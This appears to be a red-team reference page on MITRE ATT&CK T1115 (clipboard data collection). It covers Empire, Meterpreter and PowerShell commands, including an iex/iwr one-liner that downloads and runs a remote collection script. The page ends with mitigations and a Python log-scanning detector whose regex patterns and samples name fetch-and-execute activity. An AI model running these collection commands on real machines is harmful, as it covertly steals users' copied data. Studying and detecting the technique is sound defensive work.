# Clipboard Data

**ATT&CK ID:** [T1115](https://attack.mitre.org/techniques/T1115/)

**Permissions Required:** <mark style="color:green;">**User**</mark>

**Description**

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

In Windows, applications can access clipboard data by using the Windows API.

\[[Source](https://attack.mitre.org/techniques/T1115/)]

## Techniques

### Empire

This module monitors the clipboard on a specified interval for changes to copied text.

```
usemodule powershell/collection/clipboard_monitor
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FB8Dbz1d0rLXMpWFimULp%2FEmpire-Clipboard.png?alt=media\&token=13243cc2-e4fa-40d8-88a9-daeebafb5ae3)

### Get-ClipboardContents

`Get-ClipboardContents` captures what is currently in the clipboard and anything copied to the clipboard for the duration of the script's execution.

```powershell
iex (iwr -usebasicparsing https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/collection/Get-ClipboardContents.ps1);Get-ClipboardContents
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FBKbe7hJJUbZC7PZP6ti7%2FGet-ClipboardContents.png?alt=media\&token=c7aa8284-30cb-4789-b79b-06dc6d2248ae)

### Metasploit

Metasploit's `extapi` extension, which provides the clipboard commands below, can be loaded from the Meterpreter shell.

```bash
load extapi

# Read the target's current clipboard (text, files, images)
clipboard_get_data

# Dump all captured clipboard content
clipboard_monitor_dump

# Pause the active clipboard monitor
clipboard_monitor_pause

# Delete all captured clipboard content without dumping it
clipboard_monitor_purge

# Resume the paused clipboard monitor
clipboard_monitor_resume

# Start the clipboard monitor
clipboard_monitor_start

# Stop the clipboard monitor
clipboard_monitor_stop

# Write text to the target's clipboard
clipboard_set_text
```

### PowerShell

The native PowerShell command `Get-Clipboard` retrieves information that is currently stored in the clipboard.

```powershell
Get-Clipboard
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fu6ZR7mY3uRqH7zAGhJoP%2FPS-Get-Clipboard.png?alt=media\&token=c9a33b45-630e-4531-b238-3889fcc0dc82)

## Mitigations

* Monitor executed commands and arguments for attempts to collect data stored in the clipboard when users copy information within or between applications.
* Monitor API calls that could be used to collect data stored in the clipboard when users copy information within or between applications.
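
One way to apply the first point to PowerShell activity, as an added example that is not part of the original page or of any tool it names: a Python scan over PowerShell Script Block Logging events (Event ID 4104) that reassembles multi-part script blocks before matching clipboard reads. The event dicts are constructed samples, the rule names and the `event` helper are hypothetical, and the .NET and Win32 patterns are assumptions about which read paths to hunt for.

```python
import re
from collections import defaultdict

# Clipboard-read indicators. The two cmdlet/function names are from this page;
# the .NET and Win32 patterns are assumptions about other read paths to hunt for.
READ_RULES = {
    "Get-ClipboardContents": re.compile(r"\bGet-ClipboardContents\b", re.I),
    "Get-Clipboard": re.compile(r"\bGet-Clipboard\b", re.I),
    "dotnet-clipboard-read": re.compile(r"Clipboard\]::Get\w+", re.I),
    "win32-GetClipboardData": re.compile(r"\bGetClipboardData\b", re.I),
}
# Script fetched and executed in one expression, as in the iex/iwr line above.
REMOTE_EXEC = re.compile(
    r"\b(iex|Invoke-Expression)\b.*\b(iwr|Invoke-WebRequest|DownloadString)\b", re.I | re.S)

def reassemble(events):
    """Join multi-part 4104 events (same ScriptBlockId) in MessageNumber order."""
    parts = defaultdict(list)
    for ev in events:
        parts[(ev["host"], ev["user"], ev["ScriptBlockId"])].append(ev)
    for (host, user, _), evs in parts.items():
        evs.sort(key=lambda e: e["MessageNumber"])
        yield host, user, "".join(e["ScriptBlockText"] for e in evs)

def scan(events):
    """Return one finding per script block that reads the clipboard."""
    findings = []
    for host, user, text in reassemble(events):
        hits = sorted(n for n, rx in READ_RULES.items() if rx.search(text))
        if hits:  # Set-Clipboard and unrelated blocks produce no hits
            sev = "high" if REMOTE_EXEC.search(text) else "low"
            findings.append({"host": host, "user": user, "rules": hits, "severity": sev})
    return findings

def event(host, user, sbid, num, text):
    return {"host": host, "user": user, "ScriptBlockId": sbid,
            "MessageNumber": num, "ScriptBlockText": text}

# Constructed sample events; block b1 is out of order and split mid-token.
SAMPLE = [
    event("WS01", "alice", "a1", 1, "Get-Clipboard"),
    event("WS02", "bob", "b1", 2, "boardContents"),
    event("WS02", "bob", "b1", 1, "iex (iwr -usebasicparsing https://example.invalid/x.ps1);Get-Clip"),
    event("WS03", "carol", "c1", 1, "[System.Windows.Forms.Clipboard]::GetText()"),
    event("WS04", "dave", "d1", 1, "'done' | Set-Clipboard"),
]

if __name__ == "__main__":
    print(*scan(SAMPLE), sep="\n")
```

A bare `Get-Clipboard` is common in legitimate use, so the low-severity findings are best treated as hunting leads rather than alerts.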
